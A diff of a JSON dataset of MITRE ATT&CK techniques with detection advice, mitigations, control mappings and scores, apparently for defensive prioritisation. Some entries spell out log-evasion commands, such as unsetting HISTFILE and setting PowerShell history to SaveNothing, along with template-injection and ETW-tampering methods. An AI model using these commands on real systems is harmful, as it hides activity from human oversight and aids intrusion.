+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.1142857142857143,
-            "mitigation_score": 0.14545454545454545,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.0214707
+        "hardware_coverage": true
     },
     {
-        "tid": "T1221",
-        "name": "Template Injection",
-        "description": "Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)",
-        "url": "https://attack.mitre.org/techniques/T1221",
+        "tid": "T1562.003",
+        "name": "Impair Defenses: Impair Command History Logging",
+        "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
+        "url": "https://attack.mitre.org/techniques/T1562/003",
         "tactics": [
             "Defense Evasion"
         ],
-        "detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.",
+        "detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. ",
         "platforms": [
-            "Windows"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Process: Process Creation"
+            "Command: Command Execution",
+            "Sensor Health: Host Status"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1049",
-                "name": "Antivirus/Antimalware",
-                "description": "Use signatures or heuristics to detect malicious software.",
-                "url": "https://attack.mitre.org/mitigations/M1049"
-            },
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1039",
+                "name": "Environment Variable Permissions",
+                "description": "Prevent modification of environment variables by unauthorized users and groups.",
+                "url": "https://attack.mitre.org/mitigations/M1039"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 0.34285714285714286,
-        "adjusted_score": 0.34285714285714286,
+        "cumulative_score": 0.27142857142857146,
+        "adjusted_score": 0.27142857142857146,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [
-            "2.3",
-            "2.7",
             "4.1",
-            "4.8",
-            "13.3",
-            "13.8",
-            "14.1",
-            "14.2",
-            "14.6",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
-            "CA-7",
             "CM-2",
             "CM-6",
             "CM-7",
-            "CM-8",
-            "RA-5",
-            "SC-44",
-            "SC-7",
-            "SI-10",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-7",
-            "SI-8"
+            "SI-4"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.24285714285714288,
-            "mitigation_score": 0.45454545454545453,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": true
     },
     {
-        "tid": "T1222",
-        "name": "File and Directory Permissions Modification",
-        "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
-        "url": "https://attack.mitre.org/techniques/T1222",
+        "tid": "T1562.004",
+        "name": "Impair Defenses: Disable or Modify System Firewall",
+        "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ",
+        "url": "https://attack.mitre.org/techniques/T1562/004",
         "tactics": [
             "Defense Evasion"
         ],
-        "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
+        "detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Object Modification",
             "Command: Command Execution",
-            "File: File Metadata",
-            "Process: Process Creation"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1222.001",
-                "name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification",
-                "url": "https://attack.mitre.org/techniques/T1222/001",
-                "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).",
-                "detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1222.002",
-                "name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification",
-                "url": "https://attack.mitre.org/techniques/T1222/002",
-                "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ",
-                "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            }
+            "Firewall: Firewall Disable",
+            "Firewall: Firewall Rule Modification",
+            "Windows Registry: Windows Registry Key Modification"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
+        "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
             {
                 "mid": "M1022",
                 "name": "Restrict File and Directory Permissions",
                 "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                 "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.6033495823809524,
-        "adjusted_score": 0.6033495823809524,
-        "has_car": false,
-        "has_sigma": false,
+        "cumulative_score": 0.3476190476190476,
+        "adjusted_score": 0.3476190476190476,
+        "has_car": true,
+        "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
@@ -10612,40 +33395,35 @@
             "6.8"
         ],
         "nist_controls": [
-            "AC-16",
             "AC-2",
             "AC-3",
             "AC-5",
             "AC-6",
             "CA-7",
+            "CM-2",
             "CM-5",
             "CM-6",
+            "CM-7",
             "IA-2",
+            "SI-3",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": false,
+        "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2523809523809524,
-            "mitigation_score": 0.34545454545454546,
-            "detection_score": 0.15
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.00096863
+        "hardware_coverage": false
     },
     {
-        "tid": "T1480",
-        "name": "Execution Guardrails",
-        "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
-        "url": "https://attack.mitre.org/techniques/T1480",
+        "tid": "T1562.006",
+        "name": "Impair Defenses: Indicator Blocking",
+        "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
+        "url": "https://attack.mitre.org/techniques/T1562/006",
         "tactics": [
             "Defense Evasion"
         ],
-        "detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+        "detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}",
         "platforms": [
             "Linux",
             "Windows",
@@ -10653,188 +33431,95 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: Process Creation"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1480.001",
-                "name": "Execution Guardrails: Environmental Keying",
-                "url": "https://attack.mitre.org/techniques/T1480/001",
-                "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
-                "detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
-                "mitigations": [
-                    {
-                        "mid": "M1055",
-                        "name": "Do Not Mitigate",
-                        "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.",
-                        "url": "https://attack.mitre.org/mitigations/M1055"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1055",
-                "name": "Do Not Mitigate",
-                "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.",
-                "url": "https://attack.mitre.org/mitigations/M1055"
-            }
-        ],
-        "cumulative_score": 0.1,
-        "adjusted_score": 0.1,
-        "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
-    },
-    {
-        "tid": "T1482",
-        "name": "Domain Trust Discovery",
-        "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
-        "url": "https://attack.mitre.org/techniques/T1482",
-        "tactics": [
-            "Discovery"
-        ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n",
-        "platforms": [
-            "Windows"
-        ],
-        "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Script: Script Execution"
+            "Sensor Health: Host Status",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             },
             {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.48394693523809523,
-        "adjusted_score": 0.48394693523809523,
+        "cumulative_score": 0.4095238095238095,
+        "adjusted_score": 0.4095238095238095,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "3.12",
+            "3.3",
             "4.1",
-            "4.4",
-            "11.3",
-            "11.4",
-            "12.2",
-            "12.8",
+            "4.2",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
-            "AC-4",
-            "CA-8",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-10",
+            "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "RA-5",
-            "SA-17",
-            "SA-8",
-            "SC-46",
-            "SC-7"
+            "IA-2",
+            "IA-9",
+            "SC-23",
+            "SC-8",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.29523809523809524,
-            "mitigation_score": 0.32727272727272727,
-            "detection_score": 0.26
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.08870884
+        "hardware_coverage": true
     },
     {
-        "tid": "T1484",
-        "name": "Domain Policy Modification",
-        "description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\n\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
-        "url": "https://attack.mitre.org/techniques/T1484",
+        "tid": "T1562.007",
+        "name": "Impair Defenses: Disable or Modify Cloud Firewall",
+        "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
+        "url": "https://attack.mitre.org/techniques/T1562/007",
         "tactics": [
-            "Defense Evasion",
-            "Privilege Escalation"
+            "Defense Evasion"
         ],
